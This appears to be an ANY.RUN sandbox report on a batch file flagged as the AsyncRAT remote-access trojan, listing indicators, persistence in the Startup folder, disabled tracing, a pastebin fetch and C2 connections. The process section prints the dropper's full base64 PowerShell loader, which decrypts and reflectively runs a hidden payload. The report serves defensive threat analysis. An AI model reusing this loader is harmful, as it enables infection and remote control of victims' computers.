File name:

PO-TS006630009-MRTUNNING.bat

Full analysis: https://app.any.run/tasks/3fb15bab-e432-49e4-85ed-993d1dde8023
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: February 25, 2025, 22:09:18
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
pastebin
rat
asyncrat
remote
susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (57116), with CRLF line terminators
MD5:

F7CE9BCFC5A1ED9606986111DCF83E7A

SHA1:

74CD40BC060D63E857646BEDF493D53C0429EC99

SHA256:

85CA949D0D314DFFBDA2DB15032016EA4256C3ED1D937126721F849FDDEEFDF1

SSDEEP:

1536:cQya2vZlYGdcIwVdhKukmYc8Df9Rs3jhwZkbmEKUgXEXzICKUnFfQNn3:LyaoZlchTko8f9OnHftK3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5964)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5964)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3952)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Create files in the Startup directory

      • powershell.exe (PID: 5964)

    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 5964)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3952)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 3992)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3992)

    • Application launched itself

      • cmd.exe (PID: 3992)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3952)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5964)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3952)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3952)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 5964)

    • Connects to unusual port

      • powershell.exe (PID: 5964)

  • INFO

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5964)

    • Disables trace logs

      • powershell.exe (PID: 5964)

    • Checks proxy server information

      • powershell.exe (PID: 5964)

    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 3952)
      • powershell.exe (PID: 5964)

    • Found Base64 encoded compression PowerShell classes (YARA)

      • cmd.exe (PID: 3952)
      • powershell.exe (PID: 5964)

    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • cmd.exe (PID: 3952)
      • powershell.exe (PID: 5964)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 3952)
      • powershell.exe (PID: 5964)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • cmd.exe (PID: 3952)
      • powershell.exe (PID: 5964)

    • Found Base64 encoded encryption-related PowerShell classes (YARA)

      • cmd.exe (PID: 3952)
      • powershell.exe (PID: 5964)

    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • cmd.exe (PID: 3952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #ASYNCRAT powershell.exe Set Network Location Elevated Virtual Factory no specs

Process information

PID
CMD
Path
Indicators
Parent process
3952C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\PO-TS006630009-MRTUNNING.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3992C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\PO-TS006630009-MRTUNNING.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4516\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4628C:\WINDOWS\system32\DllHost.exe /Processid:{46B988E8-BEC2-401F-A1C5-16C694F26D3E}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
5592\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5964"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskb3VzbWYgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJG91c21mKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRvdXNtZiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRvdXNtZiwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkb3VzbWYiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZGR4YncoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3JqVW9vREFHZFVKdkhLTlBHOG9nTEFpV2Zxc3JRem9halhLNW1YalVmNUE9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0RjU0NocWo0bDYrSmlpbFRJYjdHdkE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gZ2d1ZmQoJHBhcmFtX3Zhcil7CSR5d3NkYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkYXF1Z2w9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkd3ZiY2E9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkeXdzZGMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHd2YmNhLkNvcHlUbygkYXF1Z2wpOwkkd3ZiY2EuRGlzcG9zZSgpOwkkeXdzZGMuRGlzcG9zZSgpOwkkYXF1Z2wuRGlzcG9zZSgpOwkkYXF1Z2wuVG9BcnJheSgpO31mdW5jdGlvbiBoaGZ0digkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJG5uYm1jPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGRxZHl5PSRubmJtYy5FbnRyeVBvaW50OwkkZHFkeXkuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJG91c21mOyRjYWZsaz1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJG91c21mKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcHdrIGluICRjYWZsaykgewlpZiAoJHB3ay5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHhyd2dvPSRwd2suU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHphb3JkPVtzdHJpbmdbXV0keHJ3Z28uU3BsaXQoJ1wnKTskeXN6dm89Z2d1ZmQgKGRkeGJ3IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHphb3JkWzBdKSkpOyR2c2Juaj1nZ3VmZCAoZGR4YncgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkemFvcmRbMV0pKSk7aGhmdHYgJHlzenZvICRudWxsO2hoZnR2ICR2c2JuaiAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
6 933
Read events
6 919
Write events
14
Delete events
0

Modification events

(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5964) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
1
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
5964powershell.exeC:\Users\admin\AppData\Roaming\MyData\DataLogs.conftext
MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
SHA256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
3952cmd.exeC:\Users\admin\dwm.battext
MD5:F7CE9BCFC5A1ED9606986111DCF83E7A
SHA256:85CA949D0D314DFFBDA2DB15032016EA4256C3ED1D937126721F849FDDEEFDF1
5964powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
5964powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uofi50br.j2g.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5964powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_563d6532.cmdtext
MD5:F7CE9BCFC5A1ED9606986111DCF83E7A
SHA256:85CA949D0D314DFFBDA2DB15032016EA4256C3ED1D937126721F849FDDEEFDF1
5964powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ilzglwx.1u2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
39
DNS requests
20
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
440
svchost.exe
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
440
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1140
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6584
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6584
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
3092
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
440
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5964
powershell.exe
104.20.3.235:443
pastebin.com
CLOUDFLARENET
whitelisted
5964
powershell.exe
217.64.148.159:50037
Obehosting AB
SE
malicious
440
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
440
svchost.exe
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
440
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.78
whitelisted
pastebin.com
  • 104.20.3.235
  • 172.67.19.24
  • 104.20.4.235
whitelisted
crl.microsoft.com
  • 23.48.23.176
  • 23.48.23.177
  • 23.48.23.174
  • 23.48.23.182
  • 23.48.23.171
  • 23.48.23.184
  • 23.48.23.188
  • 23.48.23.175
  • 23.48.23.180
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
www.bing.com
  • 184.86.251.21
  • 184.86.251.9
  • 184.86.251.27
  • 184.86.251.22
  • 184.86.251.7
whitelisted
login.live.com
  • 20.190.159.73
  • 20.190.159.2
  • 20.190.159.71
  • 20.190.159.23
  • 20.190.159.130
  • 40.126.31.130
  • 20.190.159.0
  • 40.126.31.73
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
5964
powershell.exe
Domain Observed Used for C2 Detected
REMOTE [ANY.RUN] AsyncRAT SSL certificate
5964
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Malicious SSL Cert (VenomRAT)
5964
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Malicious SSL Cert (VenomRAT)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
PO-TS006630009-MRTUNNING.bat